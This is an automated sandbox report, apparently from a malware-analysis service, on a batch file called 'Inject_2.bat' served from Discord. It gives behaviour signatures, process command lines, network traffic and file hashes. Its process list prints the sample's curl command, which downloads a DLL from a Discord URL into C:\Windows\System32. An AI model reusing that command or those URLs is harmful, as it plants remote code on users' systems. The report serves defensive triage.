Analysis Overview
Threat Level: Likely malicious
The file https://cdn.discordapp.com/attachments/1304964783895744606/1304982645205241866/Inject_2.bat?ex=67315f4c&is=67300dcc&hm=04a102d3c12358f96ea3bd1a585fe13124c4d5106541cf5689b79ed3e4483de7& was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Drops file in System32 directory
Browser Information Discovery
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
cURL User-Agent
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 01:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 01:36
Reported
2024-11-10 01:37
Platform
win10ltsc2021-20241023-en
Max time kernel
51s
Max time network
53s
Command Line
Signatures
Downloads MZ/PE file
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CompPkgsup.dll | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\System32\CompPkgsup.dll | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\System32\CompPkgsup.dll | C:\Windows\system32\curl.exe | N/A |
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 187106.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1304964783895744606/1304982645205241866/Inject_2.bat?ex=67315f4c&is=67300dcc&hm=04a102d3c12358f96ea3bd1a585fe13124c4d5106541cf5689b79ed3e4483de7&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd61df46f8,0x7ffd61df4708,0x7ffd61df4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff729625460,0x7ff729625470,0x7ff729625480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6428 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Inject (2).bat" "
C:\Windows\system32\curl.exe
curl -L -o "C:\Windows\System32\CompPkgsup.dll" "https://cdn.discordapp.com/attachments/1296944073223045172/1304972963803697182/CompPkgSup.dll?ex=67315647&is=673004c7&hm=bf658c7ee1389e8b3b467e79b92dbeb9fb8870d28dee9443c7aa6d246e00bdb2&"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Inject (2).bat" "
C:\Windows\system32\curl.exe
curl -L -o "C:\Windows\System32\CompPkgsup.dll" "https://cdn.discordapp.com/attachments/1296944073223045172/1304972963803697182/CompPkgSup.dll?ex=67315647&is=673004c7&hm=bf658c7ee1389e8b3b467e79b92dbeb9fb8870d28dee9443c7aa6d246e00bdb2&"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Inject (2).bat" "
C:\Windows\system32\curl.exe
curl -L -o "C:\Windows\System32\CompPkgsup.dll" "https://cdn.discordapp.com/attachments/1296944073223045172/1304972963803697182/CompPkgSup.dll?ex=67315647&is=673004c7&hm=bf658c7ee1389e8b3b467e79b92dbeb9fb8870d28dee9443c7aa6d246e00bdb2&"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1292297997558872771,8896713252473608501,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | data-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.61.93:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.61.93:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.61.93:443 | data-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.61.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.35.26:443 | fd.api.iris.microsoft.com | tcp |
| N/A | 127.0.0.1:58625 | tcp | |
| N/A | 127.0.0.1:58647 | tcp | |
| N/A | 127.0.0.1:58650 | tcp | |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c29339188732b78d10f11d3fb23063cb |
| SHA1 | 2db38f26fbc92417888251d9e31be37c9380136f |
| SHA256 | 0a61fa9e17b9ae7812cdeda5e890b22b14e53fa14a90db334f721252a9c874c2 |
| SHA512 | 77f1f5f78e73f4fc01151e7e2a553dc4ed9bf35dd3a9565501f698be373640f153c6d7fc83450b9d2f29aeaa72387dd627d56f287a46635c2da07c60bc3d6e2c |
\??\pipe\LOCAL\crashpad_3980_MZHMQMSZISYZFDUE
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ccff51f965f8f4176e4ad112c34c86a7 |
| SHA1 | eab249ca0f58ed7a8afbca30bdae123136463cd8 |
| SHA256 | 3eb00cf1bd645d308d0385a95a30737679be58dcc5433bc66216aac762d9da33 |
| SHA512 | 8c68f146152045c2a78c9e52198b8180b261edf61a8c28364728eafb1cba1df0fa29906e5ede69b3c1e0b67cfcbeb7fde65b8d2edbc397c9a4b99ecfe8dea2dd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 86aa28ffd286b08415aa197216684874 |
| SHA1 | d99924976c73e3220108817ad6bc1d8b1795ca2d |
| SHA256 | a6dc4bc6ade3039e57b538f2620b91602199f1908b23c4a2beb3fd3aa721579d |
| SHA512 | a51fbd1af778d32f2f95a9a863a59f42a7eb804dbb8ce85459297959eea21fbfe9625d74c3f91ad65016031d4b3e26eeb748c1c59e09ac68778fc670d408d0fa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | be2b81083ee968af4f257225a4831af7 |
| SHA1 | 519e43dbf6ef1d47e715fa47a2ce8a8be7f2a65c |
| SHA256 | e84372e355997117c4526d97fefbdf0273a41be6b0cf5d990e29377764a68a0c |
| SHA512 | 7bd6db0d06029aad15cd3e448d06ef889baa6f156c909054edb055b848d6c9ec0631725ee51c87f526526270080569f2c9eccc9c1b274ac4de277886393d56b1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 61440e50c9026e75752c93f50cf58e99 |
| SHA1 | 39e65ea283387132d5f276d2dc04bf75926dcf7e |
| SHA256 | c663d712ef428a4d20c7c87c3d34413f42a01c57952e663ffb4c8ecb5fb5accf |
| SHA512 | 2df36544ad5647a1b32035fc418b65629a5488cfe5ca9cc2376fe6de2397a1612528eb181bd28e35a0442cc13ccfa58c44fe06a2f00249f6829eda822b37f17b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 42183edf3503807b6dcf7d806f8beb25 |
| SHA1 | bd73c4f9eed3e298e6fa9b73bed3596a132cf0b7 |
| SHA256 | 412bccd81000a18aca0a15be818f3556b7a0c30d5bf19e785d41bbd3689fb838 |
| SHA512 | 686df2e41d0d343a64913cb94e6fd1015be6d77784b8783532cd84fc55513b2586cd66e1beb383f21a670006ff101410e4d80fe9362d9667061849db4324842e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\Downloads\Unconfirmed 187106.crdownload
| MD5 | 7896465a59f93dcfb5b8238ab582fd1b |
| SHA1 | 7046d05d7e5151827db7ac00eb8cda5051c14bbc |
| SHA256 | b47187691ed09d98c46e97d312c32d767d4df38606a41182abed2864c77d6c42 |
| SHA512 | ad1e214abf1976ebfa2712296c3facfb668af6cf3ee04d86c851ef96f22b80c7fcada684cafd2491300ae401de6dc9c38dc2987a18d0cc01bba92ad66660ee8c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c69e6f33e409a259c7cac93bdb65e15b |
| SHA1 | dd6c3a64e4c29b53fb8a7ca2e978e8e8a5d3fff5 |
| SHA256 | efec5dd88b1fc8eaf5e04c51a8d2ea5f68ae6c832798d7e6c3068e80ccb9f89e |
| SHA512 | 06a8f4f85a1159a2738f58053b504043af192faa32e1fc3e7c753ab47bcd4e1feaa1304c43d101cb86017ea444e09426c9b99d75ec1c152a4e5c1458253e5add |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 722f59286a05ac871141f08a33890d71 |
| SHA1 | ef2992b3608487cdd866215625f88caea90d8c96 |
| SHA256 | 799377a06d734422837fda6171c45447aa9907e2e45ca8ff6818cc1d476fcaf3 |
| SHA512 | 8ee4597609d5fe1eb60a103bab5e9cb1ef4e1ac6417309d69735a65e9b5589f1c30db67436466adee0268502a8f817ff87bce8d65a3b3851a6a8b4eb4e0757dc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 26978f38b0bce48572b90b762b7d937c |
| SHA1 | 8b8b88012fab1d37fca79575a5db81674b424867 |
| SHA256 | b38f05e2e63a1f87026aed06f5b85354570c6f91d28947466f0555276bab6afa |
| SHA512 | 501e0de5f46bfaac901cde5c39a321edc411426fd91c83427f36710fa56d20b5f6ab8f2219d963f7ab495c2df7def879652381db3876b7e2a7080921cce78379 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3e11df569b291d7188c7f1549c5de0e4 |
| SHA1 | f5dfb86da92ad0f423bd58209888051f60f1526e |
| SHA256 | d50c953362ee93eb0f230e12583985b81a431d64855a3ccfcb8192aa4756a023 |
| SHA512 | 21c92b6d0680de5be55fada820c13a6d815ffad6719eef04d4a90f8b3579656efa590c7e6d98fd130a646ed35b18b6f6860b40daf942ba0788c38bac36ddb8d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fc28e0ceb351830dab245d6341a1f4e9 |
| SHA1 | cd85cec731a237546f6d0be3df73e972320c2fef |
| SHA256 | 1f3fba9860f23396edd5f0de44bf323f84735822d18aead51cb4cf629bf283bd |
| SHA512 | 2edaea5f023356b1e7bd700b083ccb4ee8f6df296e7c22ffab432d2825e8e898de71a922c3d2b39c814819c64aa36f8e43b47c3abcdd296bfb1b9959f7f61b63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dd21709ec44f96686e78a632e2168315 |
| SHA1 | 805c4c3f2326901056c74fdbfeadc9c8e788d009 |
| SHA256 | d89cd2b90de991b9702878325bc4df33106bdac9d11b84c2d5241e83eb654917 |
| SHA512 | 1804dd44d22fd690cc8919e5abc01a2a7ac2888b26c484f2369bd0bfb471a6c744ea06999925447e7c3d23a4a6d2a06de34172487a5554c1999ae08f77e0975c |